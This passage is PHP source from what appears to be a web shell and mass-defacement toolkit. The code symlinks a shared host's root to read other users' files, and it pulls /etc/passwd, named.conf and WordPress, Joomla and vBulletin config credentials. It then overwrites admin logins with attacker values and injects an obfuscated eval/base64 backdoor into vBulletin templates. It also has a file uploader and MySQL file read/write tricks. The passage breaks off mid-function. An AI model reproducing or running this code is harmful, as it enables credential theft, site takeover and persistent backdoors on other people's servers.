  $config =" <a href='".$wh2."' target='_blank'>WHMCS</a>";
}

elseif (strpos($wh13, "200")  == true)
{
  $config =" <a href='".$wh3."' target='_blank'>WHMCS</a>";

}

///////// Joomla to 4 ///////////

elseif (strpos($jo, "200")  == true)
{
  $config=" <a href='".$jo1."' target='_blank'>Joomla</a>";
}

elseif (strpos($jo12, "200")  == true)
{
  $config=" <a href='".$jo2."' target='_blank'>Joomla</a>";
}

//////////vBulletin to 4 ///////////

elseif (strpos($vb, "200")  == true)
{
  $config=" <a href='".$vb1."' target='_blank'>vBulletin</a>";
}

elseif (strpos($vb12, "200")  == true)
{
  $config=" <a href='".$vb2."' target='_blank'>vBulletin</a>";
}

elseif (strpos($vb13, "200")  == true)
{
  $config=" <a href='".$vb3."' target='_blank'>vBulletin</a>";
}

else
{
 continue;
}
flush();
flush();

/////////////////////////////////////////////////////////////////////////////////////

$site = $user['name'] ;



flush();

echo "<tr><td><a href=http://www.".$domsws[1][0]."/>".$domsws[1][0]."</a></td>
<td>".$config."</td></tr>"; flush();

}
}
}
}

break;


/// user + domine + symlink  ///

case 'sym':

if(!is_file('named.txt')){

$d00m = @file("/etc/named.conf");

}else{

$d00m = @file("named.txt");


}
if(!$d00m)
{

                die ("<meta http-equiv='refresh' content='0; url=?sws=read'/>");
}
else

{
echo "<div class='tmp'><table align='center' width='40%'><td>Domains</td><td>Users</td><td>symlink </td>";
foreach($d00m as $dom){

if(eregi("zone",$dom)){

preg_match_all('#zone "(.*)"#', $dom, $domsws);

flush();

if(strlen(trim($domsws[1][0])) > 2){

$user = posix_getpwuid(@fileowner("/etc/valiases/".$domsws[1][0]));

flush();



$site = $user['name'] ;


@symlink("/","sym/root");

$site = $domsws[1][0];

$ir = 'ir';

$il = 'il';

if (preg_match("/.^$ir/",$domsws[1][0]) or preg_match("/.^$il/",$domsws[1][0]) )
{
$site = "<div style=' color: #FF0000 ; text-shadow: 0px 0px 1px red; '>".$domsws[1][0]."</div>";
}


echo "
<tr>

<td>
<div class='dom'><a target='_blank' href=http://www.".$domsws[1][0]."/>".$site." </a> </div>
</td>


<td>
".$user['name']."
</td>
<td>
<a href='sym/root/home/".$user['name']."/public_html' target='_blank'>symlink </a>
</td>


</tr></div> ";


flush();
flush();

}
}
}
}




break;


/// file  symlink ///

case 'file':

echo'
The file path to symlink

<br /><br />
<form method="post">
<input type="text" name="file" value="/home/user/public_html/file.name" size="60"/><br /><br />
<input type="text" name="symfile" value="file.name_sym ( Ex. :: royaliste.txt )" size="60"/><br /><br />
<input type="submit" value="symlink" name="symlink" /> <br /><br />



</form>
';

$pfile = $_POST['file'];
$symfile = $_POST['symfile'];
$symlink = $_POST['symlink'];

if ($symlink)
{


@mkdir('sym1',0777);
$c  = "Options Indexes FollowSymLinks \n DirectoryIndex ssssss.htm \n AddType txt .php \n AddHandler txt .php \n  AddType txt .html \n AddHandler txt .html \n Options all \n Options \n Allow from all \n Require None \n Satisfy Any";
$f =@fopen ('sym1/.htaccess','w');
@fwrite($f , $c);

@symlink("$pfile","sym1/$symfile");

echo '<br /><a target="_blank" href="sym1/'.$symfile.'" >'.$symfile.'</a>';

}
break;

/// bypass read

case 'read':

echo "read /etc/named.conf";
echo "<br /><br /><form method='post' action='?sws=read&save=1'><textarea cols='80' rows='20' name='file'>";
flush();
flush();


$file = '/etc/named.conf';


$r3ad = @fopen($file, 'r');
if ($r3ad){
$content = @fread($r3ad, @filesize($file));
echo "".htmlentities($content)."";
}
else if (!$r3ad)
{
$r3ad = @show_source($file) ;
}
else if (!$r3ad)
{
$r3ad = @highlight_file($file);
}
else if (!$r3ad)
{
$sm = @symlink($file,'sym.txt');


if ($sm){
$r3ad = @fopen('sym/sym.txt', 'r');
$content = @fread($r3ad, @filesize($file));
echo "".htmlentities($content)."";

}
}

echo "</textarea><br /><br /><input  type='submit' value='Save'/> </form>";


if(isset($_GET['save'])){


$cont = stripcslashes($_POST['file']);

$f = fopen('named.txt','w');

$w = fwrite($f,$cont);

                  if($w){

                  echo '<br />save has been successfully';

                  }

fclose($f);

}

break;

// passwd

case 'passwd':

if(isset($_GET['save']) and isset($_POST['file']) or @filesize('passwd.txt') > 0){


$cont = stripcslashes($_POST['file']);

if(!file_exists('passwd.txt')){

$f = @fopen('passwd.txt','w');

$w = @fwrite($f,$cont);

fclose($f);
}
if($w or @filesize('passwd.txt') > 0){
// * SHOW * //

echo "<div class='tmp'><table align='center' width='35%'><td>Users</td><td>symlink</td><td>FTP</td>";
flush();

$fil3 = file('passwd.txt');

foreach ($fil3 as $f){

     $u=explode(':', $f);
     $user = $u['0'];



echo "
<tr>


<td width='15%'>
$user
</td>

<td width='10%'>
<a href='sym/root/home/$user/public_html' target='_blank'>Symlink </a>
</td>

<td width='10%'>
<a href='$pageFTP/sym/root/home/$user/public_html' target='_blank'>FTP</a>
</td>



</tr></div> ";


flush();
flush();


}

die ("</tr></div>");
                  }

}

echo "read /etc/passwd";
echo "<br /><br /><form method='post' action='?sws=passwd&save=1'><textarea cols='80' rows='20' name='file'>";
flush();

$file = '/etc/passwd';


$r3ad = @fopen($file, 'r');
if ($r3ad){
$content = @fread($r3ad, @filesize($file));
echo "".htmlentities($content)."";
}
elseif(!$r3ad)
{
$r3ad = @show_source($file) ;
}
elseif(!$r3ad)
{
$r3ad = @highlight_file($file);
}
elseif(!$r3ad)
{

                                            for($uid=0;$uid<1000;$uid++){
                                             $ara = posix_getpwuid($uid);
                                               if (!empty($ara)) {
                                                  while (list ($key, $val) = each($ara)){
                                                    print "$val:";
                                                  }
                                                  print "\n";
                                                 }

                                        }

 }


flush();


echo "</textarea><br /><br /><input  type='submit' value='&nbsp;&nbsp;symlink&nbsp;&nbsp;'/> </form>";
flush();

break;



case 'joomla':

/////////////////////////////////////////////////////////////////// xxxxxxxxxxxxxxxxxxx ////////////////////////////


if(isset($_POST['s'])){

$file = @file_get_contents('joomla.txt');

$ex   = explode("\n",$file);

echo "<div class='tmp'><table align='center' width='40%'><td> domin </td><td> config </td><td> Result </td>";
flush();


foreach ($ex as $exp){

$es   = explode("||",$exp);

$config = $es[0];

$domin = $es[1];

$domins = trim($domin).'';

$readconfig  = @file_get_contents(trim($config));

if(ereg('JConfig',$readconfig)){



$pass    =  ex($readconfig,'$password = \'',"';");

$userdb  =  ex($readconfig,'$user = \'',"';");

$db      =  ex($readconfig,'$db = \'',"';");

$fix     =  ex($readconfig,'$dbprefix = \'',"';");

$tab     =  $fix.'users';


$con     = @mysql_connect('localhost',$userdb,$pass);

$db      = @mysql_select_db($db,$con);

$query   = @mysql_query("UPDATE `$tab`  SET `username` ='sec-w.com'");


$query3  = @mysql_query("UPDATE `$tab`  SET `password` ='44a0bcda611514625ba94e0b1c0bdaed:2iets9ydjR3iOdSuyvW54pIzyF9M1P5J'");


if ($query and $query3 ){$r = '<b style="color: #006600">Succeed </b>user [sec-w.com] pass [1]</b>';}else{$r = '<b style="color:red">failed</b>';}

$domins = trim($domin).'';

echo "<tr>
<td><a target='_blank' href='http://$domins'>$domin</a></td>
<td><a target='_blank' href='$config'>config</a></td><td>".$r."</td></tr>";
flush();



}else{

echo "<tr>
<td><a target='_blank' href='http://$domins'>$domin</a></td>
<td><a target='_blank' href='http://$exp'>config</a></td><td><b style='color:red'>failed</b></td></tr>";
flush();

}

}

die();

}

if(!is_file('named.txt')){

$d00m = @file("/etc/named.conf");

flush();


}else{

$d00m = file("named.txt");


}
if(!$d00m)
{

                die ("<meta http-equiv='refresh' content='0; url=?sws=read'/>");
}
else

{
echo "<div class='tmp'>
<form method='POST' action='$pg?sws=joomla'>
<input type='submit' value='Mass ching Admin' />
<input type='hidden' value='1' name='s' />
</form><br /><br />
<table align='center' width='40%'><td> Domains </td><td> config </td><td> Result </td>";

$f = fopen('joomla.txt','w');

foreach($d00m as $dom){

if(eregi("zone",$dom)){

preg_match_all('#zone "(.*)"#', $dom, $domsws);

if(strlen(trim($domsws[1][0])) > 2){

$user = posix_getpwuid(@fileowner("/etc/valiases/".$domsws[1][0]));

///////////////////////////////////////////////////////////////////////////////////

$wpl=$pageURL."/sym/root/home/".$user['name']."/public_html/configuration.php";
$wpp=get_headers($wpl);
$wp=$wpp[0];

$wp2=$pageURL."/sym/root/home/".$user['name']."/public_html/blog/configuration.php";
$wpp2=get_headers($wp2);
$wp12=$wpp2[0];

$wp3=$pageURL."/sym/root/home/".$user['name']."/public_html/joomla/configuration.php";
$wpp3=get_headers($wp3);
$wp13=$wpp3[0];


 ////////// joomla ////////////

$pos = strpos($wp, "200");
$config="&nbsp;";

if (strpos($wp, "200") == true )
{
 $config= $wpl;
}
elseif (strpos($wp12, "200") == true)
{
  $config= $wp2;
}
elseif (strpos($wp13, "200") == true)
{
  $config= $wp3;
}
else
{
continue;

}
flush();

/////////////////////////////////////////////////////////////////////////////////////

$dom = $domsws[1][0];

$w = fwrite($f,"$config||$dom \n");
if($w){$r = '<b style="color: #006600">Save</b>';}else{$r = '<b style="color:red">failed</b>';}


echo "<tr><td><a href=http://www.".$domsws[1][0].">".$domsws[1][0]."</a></td>
<td><a href='$config'>config</a></td><td>".$r."</td></tr>";

flush();

}
}
}
}


break;

case 'wp':

if(isset($_POST['s'])){

$file = @file_get_contents('wp.txt');

$ex   = explode("\n",$file);

echo "<div class='tmp'><table align='center' width='40%'><td> domin </td><td> config </td><td> Result </td>";
flush();
flush();


foreach ($ex as $exp){

$es   = explode("||",$exp);

$config = $es[0];

$domin = $es[1];

$domins = trim($domin).'';

$readconfig  = @file_get_contents(trim($config));

if(ereg('wp-settings.php',$readconfig)){



$pass    =  ex($readconfig,"define('DB_PASSWORD', '","');");

$userdb  =  ex($readconfig,"define('DB_USER', '","');");

$db      =  ex($readconfig,"define('DB_NAME', '","');");

$fix     =  ex($readconfig,'$table_prefix  = \'',"';");

$tab     = $fix.'users';

$con     = @mysql_connect('localhost',$userdb,$pass);

$db      = @mysql_select_db($db,$con);

$query   = @mysql_query("UPDATE `$tab` SET `user_login` ='sec-w.com'") or die;

$query   = @mysql_query("UPDATE `$tab` SET `user_pass` ='$1$4z/.5i..$9aHYB.fUHEmNZ.eIKYTwx/'") or die;



if ($query){$r = '<b style="color: #006600">Succeed </b>user [sec-w.com] pass [1]</b>';}

else

{

$r = '<b style="color:red">failed</b>';

}

$domins = trim($domin).'';

echo "<tr>
<td><a target='_blank' href='http://$domins'>$domin</a></td>
<td><a target='_blank' href='$config'>config</a></td><td>".$r."</td></tr>";

flush();
flush();

}else{

echo "<tr>
<td><a target='_blank' href='http://$domins'>$domin</a></td>
<td><a target='_blank' href='http://$config'>config</a></td><td><b style='color:red'>failed2</b></td></tr>";

flush();
flush();

}

}

die();

}

if(!is_file('named.txt')){

$d00m = @file("/etc/named.conf");

}else{

$d00m = @file("named.txt");


}
if(!$d00m)
{

                die ("<meta http-equiv='refresh' content='0; url=?sws=read'/>");
}
else

{
echo "<div class='tmp'>
<form method='POST' action='$pg?sws=wp'>
<input type='submit' value='Mass Change Admin' />
<input type='hidden' value='1' name='s' />
</form>
<br /><br />
<table align='center' width='40%'><td> Domains </td><td> config </td><td> Result </td>";

flush();
flush();

$f = fopen('wp.txt','w');

foreach($d00m as $dom){

if(eregi("zone",$dom)){

preg_match_all('#zone "(.*)"#', $dom, $domsws);

if(strlen(trim($domsws[1][0])) > 2){

$user = posix_getpwuid(@fileowner("/etc/valiases/".$domsws[1][0]));

///////////////////////////////////////////////////////////////////////////////////

$wpl=$pageURL."/sym/root/home/".$user['name']."/public_html/wp-config.php";
$wpp=get_headers($wpl);
$wp=$wpp[0];

$wp2=$pageURL."/sym/root/home/".$user['name']."/public_html/blog/wp-config.php";
$wpp2=get_headers($wp2);
$wp12=$wpp2[0];

$wp3=$pageURL."/sym/root/home/".$user['name']."/public_html/wp/wp-config";
$wpp3=get_headers($wp3);
$wp13=$wpp3[0];


 ////////// wp ////////////

$pos = strpos($wp, "200");
$config="&nbsp;";

if (strpos($wp, "200") == true )
{
 $config= $wpl;
}
elseif (strpos($wp12, "200") == true)
{
  $config= $wp2;
}
elseif (strpos($wp13, "200") == true)
{
  $config= $wp3;
}
else
{
continue;

}
flush();

/////////////////////////////////////////////////////////////////////////////////////

$dom = $domsws[1][0];

$w = fwrite($f,"$config||$dom \n");
if($w){$r = '<b style="color: #006600">Save</b>';}else{$r = '<b style="color:red">failed</b>';}


echo "<tr><td><a href=http://www.".$domsws[1][0].">".$domsws[1][0]."</a></td>
<td><a href='$config'>config</a></td><td>".$r."</td></tr>";
flush();
flush();





flush();


}
}
}
}


break;


case 'vb':


if(isset($_POST['s'])){



$file = @file_get_contents('vb.txt');

$ex   = explode("\n",$file);

echo "<div class='tmp'><table align='center' width='40%'><td> domin </td><td> config </td><td> Result </td>";


foreach ($ex as $exp){

$es   = explode("||",$exp);

$config = $es[0];

$domin = $es[1];

$domins = trim($domin).'';

$readconfig  = @file_get_contents(trim($config));

if(ereg('vBulletin',$readconfig)){

$db      =  ex($readconfig,'$config[\'Database\'][\'dbname\'] = \'',"';");
$userdb  =  ex($readconfig,'$config[\'MasterServer\'][\'username\'] = \'',"';");
$pass    =  ex($readconfig,'$config[\'MasterServer\'][\'password\'] = \'',"';");
$con     = @mysql_connect('localhost',$userdb,$pass);
$db      = @mysql_select_db($db,$con);
$shell   = "bVDPS8MwFL4L/g+vYZAWdPPiaUv14kAQFKqnUUqapjSYNKFJxCn7322abgzcIfDyvl+P7/qKs04D3tS5sJ96MMJ9b+ohDw8vTWcq31PF02yJp/WqzvEaZk2rBwWUOaF7ghAo7jrdEGS0dQh4z9zecIKUl04YOrhV4N821FEEwZQgb6SmDR8QiObsdxYheuMdRKNWSH5UxtmKn3G+v0P5TIxgNTqhWWR9rYSLAXH/RaUfgY8pbVROZ4VI0aawqN5ei/cdDlRcAiFwJEIGv4HyyLTZp4tq+/zyVOxwOASXO+yUqUI6Lm/gHxiBLDic6o62UHjGuLWQJEko99T9Gg7ApeUXJFsq5EX+AR7yPw==" ;
$crypt  = "{\${eval(gzinflate(base64_decode(\'";
$crypt .= "$shell";
$crypt .= "\')))}}{\${exit()}}</textarea>";
$sqlfaq = "UPDATE template SET template ='".$crypt."' WHERE title ='FAQ'" ;
$query  = @mysql_query($sqlfaq,$con);
if ($query){$r = '<b style="color: #006600">Succeed</b> shell in search.php';}
else
{
$r = '<b style="color:red">failed</b>';
}
$domins = trim($domin).'';

echo "<tr>
<td><a target='_blank' href='http://$domins'>$domin</a></td>
<td><a target='_blank' href='$config'>config</a></td><td>".$r."</td></tr>";
}else{
echo "<tr>
<td><a target='_blank' href='http://$domins'>$domin</a></td>
<td><a target='_blank' href='http://$config'>config</a></td><td><b style='color:red'>failed2</b></td></tr>";
}
}
die();
}
if(!is_file('named.txt')){
$d00m = file("/etc/named.conf");
}else{
$d00m = file("named.txt");
}
if(!$d00m)
{
die ("<meta http-equiv='refresh' content='0; url=?sws=read'/>");
}
else
{
echo "<div class='tmp'>
<form method='POST' action='$pg?sws=vb'>
<input type='submit' value='Inject shell' />
<input type='hidden' value='1' name='s' />
</form>
<br /><br />
<table align='center' width='40%'><td> Domains </td><td> config </td><td> Result </td>";

$f = fopen('vb.txt','w');

foreach($d00m as $dom){

if(eregi("zone",$dom)){

preg_match_all('#zone "(.*)"#', $dom, $domsws);

if(strlen(trim($domsws[1][0])) > 2){

$user = posix_getpwuid(@fileowner("/etc/valiases/".$domsws[1][0]));

///////////////////////////////////////////////////////////////////////////////////

$wpl=$pageURL."/sym/root/home/".$user['name']."/includes/config.php";
$wpp=get_headers($wpl);
$wp=$wpp[0];

$wp2=$pageURL."/sym/root/home/".$user['name']."/vb/includes/config.php";
$wpp2=get_headers($wp2);
$wp12=$wpp2[0];

$wp3=$pageURL."/sym/root/home/".$user['name']."/forum/includes/config.php";
$wpp3=get_headers($wp3);
$wp13=$wpp3[0];


 ////////// vb ////////////

$pos = strpos($wp, "200");
$config="&nbsp;";

if (strpos($wp, "200") == true )
{
 $config= $wpl;
}
elseif (strpos($wp12, "200") == true)
{
  $config= $wp2;
}
elseif (strpos($wp13, "200") == true)
{
  $config= $wp3;
}
else
{
continue;
}
flush();
/////////////////////////////////////////////////////////////////////////////////////
$dom = $domsws[1][0];
$w = fwrite($f,"$config||$dom \n");
if($w){$r = '<b style="color: #006600">Save</b>';}else{$r = '<b style="color:red">failed</b>';}
echo "<tr><td><a href=http://www.".$domsws[1][0].">".$domsws[1][0]."</a></td>
<td><a href='$config'>config</a></td><td>".$r."</td></tr>";
flush();
}
}
}
}
break;
case 'help':
echo "<div class='tmp'>
<table align='center' width='40%'><td>function</td><td>Case</td>";
$safe_mode = ini_get('safe_mode');
     if($safe_mode){$r = "<b style='color: red'>False</b>";}else{$r = "<b style='color: #336600'>True</b>";}
echo "<tr><td>Safe Mode</td><td>$r</td>";
$fun = function_exists('symlink');
     if(!$fun){$r = "<b style='color: red'>False</b>";}else{$r = "<b style='color: #336600'>True</b>";}
echo "<tr><td>function symlink</td><td>$r</td>";
$fun = function_exists('file');
     if(!$fun){$r = "<b style='color: red'>False</b>";}else{$r = "<b style='color: #336600'>True</b>";}
echo "<tr><td>function file</td><td>$r</td>";
$fun = function_exists('file_get_contents');
     if(!$fun){$r = "<b style='color: red'>False</b>";}else{$r = "<b style='color: #336600'>True</b>";}
echo "<tr><td>function file_get_contents</td><td>$r</td>";
$fun = function_exists('mkdir');
     if(!$fun){$r = "<b style='color: red'>False</b>";}else{$r = "<b style='color: #336600'>True</b>";}
echo "<tr><td>function mkdir</td><td>$r</td>";
$fun = is_dir('sym/root');
     if(!$fun){$r = "<b style='color: red'>False</b>";}else{$r = "<b style='color: #336600'>True</b>";}
echo "<tr><td>Permission denied</td><td>$r</td>";
$fun = preg_match('/Forbidden/',@file_get_contents('sym/root') or !@file_get_contents('sym/root'));
     if($fun){$r = "<b style='color: red'>False</b>";}else{$r = "<b style='color: #006600'>True</b>";}
echo "<tr><td>Forbidden</td><td>$r</td>";
echo "</table></div>";
break;
default:
header("Location: $pg");
}
}else
{
echo '<br /><br /><form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';
echo '<input type="file" name="file" value="Choose file" size="60" ><input name="_upl" type="submit" id="_upl" value="Upload"></form>';
if( $_POST['_upl'] == "Upload" ) {
	if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<br /><br /><b>Uploaded successful !!<br><br>'; }
	else { echo '<br /><br />Not uploaded !!<br><br>'; }
}
echo '
<br /><br /><br /></b></b><div class="fot">Cod3d by <b>S3n4t00r</b> Idea by <b>Mr.Alsa3ek</b>
<br /><br />
<b style="color: red";>   Sec-w.Com  </b>
<br /><br />
Muslims Hackers</div> ';

}
function ex($text,$a,$b){
$explode = explode($a,$text);
$explode = explode($b,$explode[1]);
return $explode[0];
}
echo '</div>
<a style="text-decoration: none; color: #F4F4F4;" title="???????"/href="http://sec-w.com/cc">???????</a>
<a style="text-decoration: none; color: #F4F4F4;" title="???? ???????"/href="http://sec-w.com/cc">???? ???????</a>
</body>
</html>
';
?>';$file = fopen("sym.php" ,"w+");$write = fwrite ($file ,base64_decode($symlinker));fclose($file); echo "Click Here";}elseif ($action == 'cpn') {@chdir('damane');$crackftp = '<?php
header('Content-Type: text/html; charset=windows-1256');
/*
Turbo Force By Tryag.Cc
*/
@set_time_limit(0);
@error_reporting(0);
if($_POST['page']=='chmod')
{
$pathclass=$_POST[pathclass];
$namefile=$_POST[namefile];
if(chmod($pathclass,$namefile))
{
echo '<center><b>License has been successfully';
}else{
echo '<center><b>Failure';
}

exit;
}


if($_POST['page']=='file_mysql')
{
$connect = mysql_connect('localhost',$_POST['mysql_l'], $_POST['mysql_p']);
mysql_select_db($_POST['mysql_db'],$connect);

$query = "CREATE TABLE `ttt` (`wwww` TEXT NOT NULL) ENGINE = MYISAM ;";
if(mysql_query($query))
{
$codes=$_POST[codes];
$query2 = "INSERT INTO `ttt` (`wwww`)VALUES('$codes');";
if(mysql_query($query2))
{

$pathclass = $_POST['pathclass'];
if(mysql_query(stripslashes("select * into dumpfile '$pathclass' from ttt")))
{
echo "The file was created successfully<br>$pathclass";
$query4 = "DROP TABLE `ttt`";
mysql_query($query4);
}else{
$error = mysql_error();
echo "Failure<br>$error";
}

}else{echo 'There is an error in accepting the code';
$query4 = "DROP TABLE `ttt`";
mysql_query($query4);
}

}
$query4 = "DROP TABLE `ttt`";
mysql_query($query4);

exit;
}

if($_POST['page']=='read_mysql')
{
$unique = uniqid('N');
$file = $_POST['pathclass'];
$query = array( "CREATE TEMPORARY TABLE $unique (file LONGBLOB)", "LOAD DATA INFILE '".mysql_real_escape_string($file)."' INTO TABLE $unique", "SELECT * FROM $unique" );
$connect = mysql_connect('localhost',$_POST['mysql_l'], $_POST['mysql_p']);
mysql_select_db($_POST['mysql_db'],$connect);
echo '<textarea name="db_query" style="width: 800px; height: 400px;" dir="ltr">';
foreach($query as $Allqueries)
{
$mysqlQuery = mysql_query($Allqueries,$connect);
while($line = @mysql_fetch_row($mysqlQuery))
echo htmlspecialchars($line[0]);
}
echo '</textarea>';
exit;
}
if($_POST['page']=='download')
{
$namefile=$_POST['namefile'];

if($_POST['namefile']==null)
{
$test1=explode(".",$pathclass);
if(strpos($test1[0],"\\"))
{
$test2=explode("\\\\",$test1[0]);
}else{
$test2=explode("/",$test1[0]);
}
$st=count($test2);
$st=$st-1;
$namefile=$test2[$st].'.'.$test1[1];

}

	header('Content-Description: File Transfer');
    header('Content-Type: application/octet-stream');
    header('Content-Disposition: attachment; filename='.basename($namefile));
    header('Content-Transfer-Encoding: binary');
    header('Expires: 0');
    header('Cache-Control: must-revalidate');
    header('Pragma: public');
    header('Content-Length: ' . filesize($namefile));
    ob_clean();
    flush();
    readfile($pathclass);
exit;
}

echo '
<html dir="rtl">

<head>



<style type="text/css">
.style1 {
	font-weight: bold;
	direction: rtl;
}

<!--
body {
	background-color: #000000;
    font-size: 18px;
	color: #cccccc;
}
input,textarea,select{
font-weight: bold;
color: #cccccc;
dashed #ffffff;
border: 1px
solid #2C2C2C;
background-color: #080808
}
a {
	background-color: #151515;
	vertical-align: bottom;
	color: #000;
	text-decoration: none;
	font-size: 20px;
	margin: 8px;
	padding: 6px;
	border: thin solid #000;
}
a:hover {
	background-color: #080808;
	vertical-align: bottom;
	color: #333;
	text-decoration: none;
	font-size: 20px;
	margin: 8px;
	padding: 6px;
	border: thin solid #000;
}
.style1 {
	text-align: center;
}
.style2 {
	color: #FFFFFF;
	font-weight: bold;
}
.style3 {
	color: #FFFFFF;
}
-->
</style>

</head>
';


function in($type,$name,$size,$value,$checked=0) 
 {
 $ret = "<input type=".$type." name=".$name." "; if($size != 0) 
 {
 $ret .= "size=".$size." "; }
 $ret .= "value=\"".$value."\""; if($checked) $ret .= " checked"; return $ret.">"; }
 
class my_sql 
 {
 var $host = 'localhost'; var $port = ''; var $user = ''; var $pass = ''; var $base = ''; var $db = ''; var $connection; var $res; var $error; var $rows; var $columns; var $num_rows; var $num_fields; var $dump; function connect() 
 {
 switch($this->db) 
 {
 case 'MySQL': if(empty($this->port)) 
 {
 $this->port = '3306'; }
 if(!function_exists('mysql_connect')) return 0; $this->connection = @mysql_connect($this->host.':'.$this->port,$this->user,$this->pass); if(is_resource($this->connection)) return 1; $this->error = @mysql_errno()." : ".@mysql_error(); break; case 'MSSQL': if(empty($this->port)) 
 {
 $this->port = '1433'; }
 if(!function_exists('mssql_connect')) return 0; $this->connection = @mssql_connect($this->host.','.$this->port,$this->user,$this->pass); if($this->connection) return 1; $this->error = "Can't connect to server"; break; case 'PostgreSQL': if(empty($this->port)) 
 {
 $this->port = '5432'; }
 $str = "host='".$this->host."' port='".$this->port."' user='".$this->user."' password='".$this->pass."' dbname='".$this->base."'"; if(!function_exists('pg_connect')) return 0; $this->connection = @pg_connect($str); if(is_resource($this->connection)) return 1; $this->error = @pg_last_error($this->connection); break; case 'Oracle': if(!function_exists('ocilogon')) return 0; $this->connection = @ocilogon($this->user, $this->pass, $this->base); if(is_resource($this->connection)) return 1; $error = @ocierror(); $this->error=$error['message']; break; }
 return 0; }
 function select_db() 
 {
 switch($this->db) 
 {
 case 'MySQL': if(@mysql_select_db($this->base,$this->connection)) return 1; $this->error = @mysql_errno()." : ".@mysql_error(); break; case 'MSSQL': if(@mssql_select_db($this->base,$this->connection)) return 1; $this->error = "Can't select database"; break; case 'PostgreSQL': return 1; break; case 'Oracle': return 1; break; }
 return 0; }
 function query($query) 
 {
 $this->res=$this->error=''; switch($this->db) 
 {
 case 'MySQL': if(false===($this->res=@mysql_query('/*'.chr(0).'*/'.$query,$this->connection))) 
 {
 $this->error = @mysql_error($this->connection); return 0; }
 else if(is_resource($this->res)) 
 {
 return 1; }
 return 2; break; case 'MSSQL': if(false===($this->res=@mssql_query($query,$this->connection))) 
 {
 $this->error = 'Query error'; return 0; }
 else if(@mssql_num_rows($this->res) > 0) 
 {
 return 1; }
 return 2; break; case 'PostgreSQL': if(false===($this->res=@pg_query($this->connection,$query))) 
 {
 $this->error = @pg_last_error($this->connection); return 0; }
 else if(@pg_num_rows($this->res) > 0) 
 {
 return 1; }
 return 2; break; case 'Oracle': if(false===($this->res=@ociparse($this->connection,$query))) 
 {
 $this->error = 'Query parse error'; }
 else 
 {
 if(@ociexecute($this->res)) 
 {
 if(@ocirowcount($this->res) != 0) return 2; return 1; }
 $error = @ocierror(); $this->error=$error['message']; }
 break; }
 return 0; }
 function get_result() 
 {
 $this->rows=array(); $this->columns=array(); $this->num_rows=$this->num_fields=0; switch($this->db) 
 {
 case 'MySQL': $this->num_rows=@mysql_num_rows($this->res); $this->num_fields=@mysql_num_fields($this->res); while(false !== ($this->rows[] = @mysql_fetch_assoc($this->res))); @mysql_free_result($this->res); if($this->num_rows)
 {
$this->columns = @array_keys($this->rows[0]); return 1;}
 break; case 'MSSQL': $this->num_rows=@mssql_num_rows($this->res); $this->num_fields=@mssql_num_fields($this->res); while(false !== ($this->rows[] = @mssql_fetch_assoc($this->res))); @mssql_free_result($this->res); if($this->num_rows)
 {
$this->columns = @array_keys($this->rows[0]); return 1;}
; break; case 'PostgreSQL': $this->num_rows=@pg_num_rows($this->res); $this->num_fields=@pg_num_fields($this->res); while(false !== ($this->rows[] = @pg_fetch_assoc($this->res))); @pg_free_result($this->res); if($this->num_rows)
 {
$this->columns = @array_keys($this->rows[0]); return 1;}
 break; case 'Oracle': $this->num_fields=@ocinumcols($this->res); while(false !== ($this->rows[] = @oci_fetch_assoc($this->res))) $this->num_rows++; @ocifreestatement($this->res); if($this->num_rows)
 {
$this->columns = @array_keys($this->rows[0]); return 1;}
 break; }
 return 0; }
 function dump($table) 
 {
 if(empty($table)) return 0; $this->dump=array(); $this->dump[0] = '##'; $this->dump[1] = '## --------------------------------------- '; $this->dump[2] = '##  Created: '.date ("d/m/Y H:i:s"); $this->dump[3] = '## Database: '.$this->base; $this->dump[4] = '##    Table: '.$table; $this->dump[5] = '## --------------------------------------- '; switch($this->db) 
 {
 case 'MySQL': $this->dump[0] = '## MySQL dump'; if($this->query('/*'.chr(0).'*/ SHOW CREATE TABLE `'.$table.'`')!=1) return 0; if(!$this->get_result()) return 0; $this->dump[] = $this->rows[0]['Create Table'].";"; $this->dump[] = '## --------------------------------------- '; if($this->query('/*'.chr(0).'*/ SELECT * FROM `'.$table.'`')!=1) return 0; if(!$this->get_result()) return 0; for($i=0;$i<$this->num_rows;$i++) 
 {
 foreach($this->rows[$i] as $k=>$v) 
 {
$this->rows[$i][$k] = @mysql_real_escape_string($v);}
 $this->dump[] = 'INSERT INTO `'.$table.'` (`'.@implode("`, `", $this->columns).'`) VALUES (\''.@implode("', '", $this->rows[$i]).'\');'; }
 break; case 'MSSQL': $this->dump[0] = '## MSSQL dump'; if($this->query('SELECT * FROM '.$table)!=1) return 0; if(!$this->get_result()) return 0; for($i=0;$i<$this->num_rows;$i++) 
 {
 foreach($this->rows[$i] as $k=>$v) 
 {
$this->rows[$i][$k] = @addslashes($v);}
 $this->dump[] = 'INSERT INTO '.$table.' ('.@implode(", ", $this->columns).') VALUES (\''.@implode("', '", $this->rows[$i]).'\');'; }
 break; case 'PostgreSQL': $this->dump[0] = '## PostgreSQL dump'; if($this->query('SELECT * FROM '.$table)!=1) return 0; if(!$this->get_result()) return 0; for($i=0;$i<$this->num_rows;$i++) 
 {
 foreach($this->rows[$i] as $k=>$v) 
 {
$this->rows[$i][$k] = @addslashes($v);}
 $this->dump[] = 'INSERT INTO '.$table.' ('.@implode(", ", $this->columns).') VALUES (\''.@implode("', '", $this->rows[$i]).'\');'; }
 break; case 'Oracle': $this->dump[0] = '## ORACLE dump'; $this->dump[] = '## under construction'; break; default: return 0; break; }
 return 1; }
 function close() 
 {
 switch($this->db) 
 {
 case 'MySQL': @mysql_close($this->connection); break; case 'MSSQL': @mssql_close($this->connection); break; case 'PostgreSQL': @pg_close($this->connection); break; case 'Oracle': @oci_close($this->connection); break; }
 }
 function affected_rows() 
 {
 switch($this->db) 
 {
 case 'MySQL': return @mysql_affected_rows($this->res); break; case 'MSSQL': return @mssql_affected_rows($this->res); break; case 'PostgreSQL': return @pg_affected_rows($this->res); break; case 'Oracle': return @ocirowcount($this->res); break; default: return 0; break; }
 }
 }
 if(!empty($_POST['cccc']) && $_POST['cccc']=="download_file" && !empty($_POST['d_name'])) 
 {
 if(!$file=@fopen($_POST['d_name'],"r")) 
 {
 err(1,$_POST['d_name']); $_POST['cccc']=""; }
 else 
 {
 @ob_clean(); $filename = @basename($_POST['d_name']); $filedump = @fread($file,@filesize($_POST['d_name'])); fclose($file); $content_encoding=$mime_type=''; compress($filename,$filedump,$_POST['compress']); if (!empty($content_encoding)) 
 {
 header('Content-Encoding: ' . $content_encoding); }
